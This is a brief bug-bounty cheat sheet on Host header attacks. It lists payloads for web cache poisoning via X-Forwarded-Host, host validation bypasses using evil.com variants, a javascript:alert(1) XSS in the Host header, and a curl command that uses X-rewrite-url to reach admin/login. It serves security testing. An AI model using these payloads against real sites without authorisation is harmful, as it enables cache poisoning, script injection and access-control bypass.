Host-Header
Summary For Host Header
Also Check This Things While Testing
Add two
HOST:
in Request.Try this Headers
If you come across
/api.json
in any AEM instance during bug hunting, try for web cache poisoning via followingHost: , X-Forwarded-Server , X-Forwarded-Host:
and or simply try https://localhost/api.json HTTP/1.1Also try
Host: redacted.com.evil.com
Try Host: evil.com/redacted.com https://hackerone.com/reports/317476
Try this too
Host: example.com?.mavenlink.com
Try
Host: javascript:alert(1);
Xss payload might result in debugging mode. https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.htmlBypass front server restrictions and access to forbidden files and directories through
X-Rewrite-Url/X-original-url:
curl -i -s -k -X 'GET' -H 'Host: <site>' -H 'X-rewrite-url: admin/login' 'https://<site>/'.
Author:
Last updated